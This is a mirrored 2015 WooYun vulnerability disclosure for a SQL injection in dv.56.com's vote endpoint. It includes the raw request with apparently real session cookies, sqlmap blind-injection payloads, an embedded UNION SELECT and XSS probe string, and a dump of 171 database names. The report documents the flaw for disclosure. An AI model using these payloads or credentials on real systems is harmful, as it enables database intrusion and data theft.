乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
常规注入
POST /2012byz/index.php?action=Index&do=Vote HTTP/1.1Content-Length: 138Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://dv.56.com/Cookie: PHPSESSID=3nd5eknrfpk07dvocq3kdqek30; SERVERID=b1f8683e17785f3e401ea4f9fc0e8862|1442584785|1442584021; lang=zh-cn; theme=default; resourceurl=http%3A%2F%2Fg7s.resources.huoyunren.com%2F; ucenterurl=http%3A%2F%2Fg7s.ucenter.huoyunren.com; _TOKEN=7a6c5d373238f581141b96a14f35caf1; userTheme=smart-style-2; LOGIN_LOGO=http%3A%2F%2Fg7s-fs.oss-cn-hangzhou.aliyuncs.com%2Fattachment%2F2015-08-27%2F1887369BBA28A81E71C3A02219C4106F.png; uc=CCADD301C97EC35DDCA6E0C2444DDD3D; blackbird={pos:1,size:0,load:null}; Dbp_forward_url=http%3A%2F%2Fdemo.destoon.com%2Fv5.0%2Fmember%2Flogin.php%3Fforward%3Dhttp%253A%252F%252Fdemo.destoon.com%252Fv5.0%252Fmember%252Frecord.php%253Faction%253Dpay%2526mid%253D-1%252F%252A%252150000union%252A%252F%252F%252A%252150000select%252A%252Fuser%2528%2529%252C2%252Cdatabase%2528%2529%252Cversion%2528%2529%252C5%252C6%252C7%252C8%252C9--; AJSTAT_ok_pages=2; AJSTAT_ok_times=1; Dbp_guest_truename=?????|??|; Dbp_guest_areaid=394; [email protected]; Dbp_auth=AD81XxMgXGgPBjJRXGsbOmgZDjV8QDdqIkBpMnRLUTcrSTFTLElCdTQEJBNmVgxvdRZ9EG9UBWZRP3xIdE5ZPAAzNVUTJ1w-S-DzcyDVxrG3FoCQ4-S-fEc3USJMaQp-Z-c1EzK-Z-AxOCxy; Dbp_userid=8945; Dbp_username=dest22; broadcast_channel=www.acunetix-referrer.com; fuid=14429826465401978773; landingrefer=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); 56authcode=nggek31qfo6vuhc5n4nnf3c0i0; geoip=%b1%b1%be%a9%ca%d0%b1%b1%be%a9%ca%d0-114.247.50.2; pudm_AAAA=MLuxM453B1zDlFHAtWs6Q2mzX02rW+sFaUdfZRS0OxMQ2qUuT0gVR3Te7/KLoBn9v6v9j+Wp2FghVeprXEpNiPHvzT+4pv7k84oArWnzLXI9j0ieH1dnznNaDA==; uid=2002997071; dianboRand=1602; ick=de7a6a1b-a24f-4ed3-9681-297994886055Host: dv.56.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*vid=1
---Parameter: vid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: vid=-2627" OR 6159=6159 AND "KRCv"="KRCv Vector: OR [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: vid=1" AND (SELECT * FROM (SELECT(SLEEP(5)))Wbjw) AND "OiiS"="OiiS Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---back-end DBMS: MySQL 5.0.12available databases [171]:[*] `#hysql50#cooperate_mr-top`[*] `2012byz`[*] `56pro`[*] `56sys`[*] active[*] alan[*] baba[*] backup[*] baobao_2013[*] biye2012[*] brand[*] broadcast[*] c2c[*] colperate_xyzt[*] colperate_zzyx[*] comment_lott[*] cooherate_zgch[*] cooperate[*] cooperate_2008[*] cooperate_51tv[*] cooperate_anycall[*] cooperate_backkom[*] cooperate_bbsee[*] cooperate_beauty[*] cooperate_dance[*] cooperate_ddt[*] cooperate_dgch[*] cooperate_doufaxiuxianjian[*] cooperate_frxz2[*] cooperate_fun[*] cooperate_gamech[*] cooperate_gtj[*] cooperate_happy_castle[*] cooperate_hhsh[*] cooperate_hhzw[*] cooperate_icinemec[*] cooperate_jxfy[*] cooperate_jxqy[*] cooperate_kdjl[*] cooperate_lhzs[*] cooperate_mcsd[*] cooperate_mhsg[*] cooperate_mjtx[*] cooperate_mlxt[*] cooperate_muchang[*] cooperate_pkcar[*] cooperate_pkfzl[*] cooperate_pmjx[*] cooperate_puke[*] cooperate_rxsg[*] cooperate_rxxy[*] cooperate_sgfy[*] cooperate_sml[*] cooperate_smzt[*] cooperate_sxd[*] cooperate_sydh[*] cooperate_tdyx[*] cooperate_torch2008[*] cooperate_tvb[*] cooperate_tzr[*] cooperate_wlyx[*] cooperate_wulin[*] cooperate_wztx[*] cooperate_xj[*] cooperate_xyj[*] cooperate_yjdx[*] cooperate_yqcm[*] cooperate_zsg[*] cooperate_zxl_test1[*] cooperate_zxl_test2[*] cooperate_zywy[*] coopv_ask_and_answer[*] coopv_hunantv[*] coopv_huodong[*] coopv_huodongutf8[*] coopv_mingxing[*] coopv_top[*] dia@cha[*] dingcan[*] dreamlist[*] dvman1[*] eight_years[*] enjoyingworld[*] exam[*] fiesta[*] food2012[*] game[*] gif[*] gift_box_2013[*] glh2014[*] hd[*] hd_2012_motherday[*] hd_2012_oscar[*] hd_beachbaby_2011[*] hd_common[*] hd_ent_dv_2011[*] hd_ent_hongren_2011[*] hd_ent_hunle_2011[*] hd_gift[*] hd_jinlong_2012[*] hd_kehan_2011[*] hd_lili[*] hd_ndshipin[*] hd_renren56[*] hd_shuixing_test1[*] hd_szy_2011[*] homeintro[*] hsh_ypcm[*] huaxin[*] huodong[*] huodong2014_freestyle[*] huodong_56happy[*] huodong_chaoqing[*] huodong_freevip[*] huodong_huaer[*] huodong_kongjianneice_2012[*] huodong_piao[*] information_schema[*] intro_2010[*] jing[*] join_notes[*] ksong[*] kxll[*] lepuur[*] library[*] lili_test[*] male2008[*] mhuan163[*] miss[*] mmdianli[*] mmpk[*] mmtea[*] mmzhaomu[*] monitor[*] mxyh[*] mysql[*] new56[*] news_center_wb[*] niurenku_youstyle[*] offline2013[*] olympics_2012[*] pepsi[*] performance_schema[*] php_imgadmin[*] publish[*] rb[*] sgfy_lucky[*] share[*] shengda[*] sp_sp61[*] special[*] special_thx[*] spstat[*] tianyi[*] town[*] travel[*] tslxx[*] url_complain[*] videoPrize[*] viki[*] voiceonline[*] vote[*] vote2010[*] world_cup_2010[*] xxxx[*] youmo[*] yurenjie[*] zhaocha[*] zhongqiuzhufu[*] zht_new[*] zlottery
~fix
危害等级:中
漏洞Rank:5
确认时间:2015-09-23 23:09
废弃代码,谢谢提醒
暂无